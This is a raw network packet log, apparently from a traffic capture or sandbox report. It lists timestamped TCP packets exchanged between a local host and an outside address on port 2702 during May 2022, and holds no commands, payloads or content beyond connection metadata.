May 17, 2022 12:13:15.861814976 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.861848116 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.861947060 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.862847090 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.862971067 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.863756895 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.863888979 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.864900112 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.865082979 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.865837097 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.865946054 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.866043091 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.866117001 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.866905928 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.867005110 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.867785931 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.867885113 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.868763924 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.868860960 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.869730949 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.869864941 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.870786905 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.870831013 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.870882988 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.870908022 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.871948004 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.872039080 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.872771025 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.872859001 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.873464108 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.873557091 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.873933077 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.880126953 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.880306005 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.880307913 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.880388021 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.880412102 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.880477905 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.880574942 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.880637884 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.880758047 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.880848885 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.880889893 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.880944967 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.881023884 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.881095886 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.881925106 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.882015944 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.882064104 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.882110119 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.882735968 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.882842064 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.031685114 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.039066076 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.039345980 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.040585995 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.040879965 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.041028023 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.041588068 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.041779995 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.041897058 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.043935061 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.044987917 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.045802116 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.045855999 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.045876980 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.045960903 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.046732903 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.048043013 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.048501968 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.048888922 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.048933029 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.049015045 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.049879074 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.050760031 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.051367998 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.052088976 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.052263021 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.052520037 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.052748919 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.053700924 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.053889036 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.054771900 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.054883003 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.054986000 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.055742979 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.056847095 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.057787895 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.057795048 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.057840109 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.058243990 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.059596062 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.060647011 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.060796022 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.060833931 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.061110973 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.061219931 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.061918974 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.062791109 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.063081026 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.063713074 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.063796997 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.064212084 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.064857006 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.065972090 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.066314936 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.066951036 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.067017078 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.068315029 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.072536945 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.073415041 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.073771954 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.074413061 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.074558973 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.074614048 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.074848890 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.075220108 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.075285912 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.075639009 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.075731039 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.075762033 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.078867912 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.079797983 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.079850912 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.079955101 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.081968069 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.082122087 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.091413021 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.229865074 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.230029106 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.230873108 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.231867075 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.231936932 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.232073069 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.232764959 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.232861996 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.233771086 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.233814001 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.233891010 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.234734058 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.235902071 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.235975981 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.237063885 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.237694025 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.237773895 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.237793922 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.238744020 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.238841057 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.240345001 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.241518021 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.241599083 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.241731882 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.242151976 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.242914915 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.242948055 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.243011951 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.243051052 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.243659019 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.244791031 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.244884968 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.250896931 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.250936031 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.251044989 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.251270056 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.251300097 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.251348019 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.251348972 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.251725912 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.251804113 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.252338886 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.252491951 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.252619028 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.254410028 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.259799004 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.259955883 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.260427952 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.260509968 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.260602951 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.260633945 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.260729074 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.260864973 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.261024952 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.261080027 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.261106968 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.261133909 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.261298895 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.261423111 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.262161016 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.262192011 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.262234926 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.262265921 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.262841940 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.262868881 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.263012886 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.263015985 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.263123035 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.263401031 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.263520002 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.263647079 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.263902903 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.264903069 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.264930964 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.264990091 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.265947104 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.266071081 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.266664028 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.266774893 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.267735958 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.267775059 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.268661976 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.268774033 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.269865990 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.271114111 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.271886110 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.271980047 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.272083044 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.272209883 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.273056030 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.273646116 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.273753881 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.274066925 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.274806976 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.275109053 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.275940895 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.275990009 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.276278973 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.277782917 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.278023958 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.278126001 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.278249979 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.281574011 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.281687975 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.281977892 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.282388926 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.282471895 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.282478094 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.282681942 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.282854080 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.283137083 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.283196926 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.283830881 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.283873081 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.284753084 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.284837008 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.285305023 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.285600901 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.286396980 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.422935009 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.423846960 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.423983097 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.426049948 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.549148083 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.593342066 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.610295057 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.779853106 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.779953003 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.781864882 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.781980038 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.782887936 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.782959938 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.783018112 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.783076048 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.783423901 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.783783913 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.783848047 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.783860922 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.783880949 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.783963919 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.784678936 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.784775972 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.786133051 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.786228895 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.787233114 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.787261009 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.787322998 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.787349939 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.787728071 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.787795067 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.788817883 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.788882017 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.788921118 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.788937092 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.789807081 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.789932013 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.790931940 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.791054964 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.791846991 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.791933060 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.792167902 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.792294979 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.792736053 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.792918921 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.793935061 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.794011116 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.794044018 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.794064999 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.794732094 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.794825077 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.795761108 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.795830011 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.797297001 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.797379017 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.797399044 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.797728062 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.797888041 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.797964096 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.798667908 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.798793077 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.799746037 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.799817085 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.799900055 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.800664902 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.800731897 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.800796032 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.801708937 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.801780939 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.802316904 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:16.802402020 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.852540016 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:16.939018011 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:17.032608986 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:17.032872915 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:17.143451929 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:17.273435116 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:17.273533106 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:21.489372969 CEST	49757	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:21.682518959 CEST	2702	49757	185.19.85.141	192.168.2.3
May 17, 2022 12:13:21.686906099 CEST	49757	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:21.755444050 CEST	49757	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:22.002588987 CEST	2702	49757	185.19.85.141	192.168.2.3
May 17, 2022 12:13:22.002882004 CEST	49757	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:22.132535934 CEST	2702	49757	185.19.85.141	192.168.2.3
May 17, 2022 12:13:22.236330032 CEST	49757	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:22.242472887 CEST	2702	49757	185.19.85.141	192.168.2.3
May 17, 2022 12:13:22.242557049 CEST	49757	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:22.432885885 CEST	2702	49757	185.19.85.141	192.168.2.3
May 17, 2022 12:13:22.433062077 CEST	49757	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:22.672468901 CEST	2702	49757	185.19.85.141	192.168.2.3
May 17, 2022 12:13:22.672629118 CEST	49757	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:22.912677050 CEST	2702	49757	185.19.85.141	192.168.2.3
